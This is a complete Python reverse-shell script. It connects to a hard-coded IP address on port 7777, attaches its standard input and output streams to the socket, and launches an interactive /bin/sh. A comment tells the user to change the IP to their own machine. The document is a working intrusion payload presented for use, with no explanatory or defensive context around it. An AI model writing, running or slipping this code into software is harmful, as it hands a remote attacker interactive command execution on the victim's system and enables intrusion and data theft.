#!/usr/bin/env python3

import socket,subprocess,os;

HOST = "10.4.31.108" #CHANGE to your machine's IP 
PORT = 7777 
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect((HOST,PORT));
os.dup2(s.fileno(),0); 
os.dup2(s.fileno(),1); 
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);
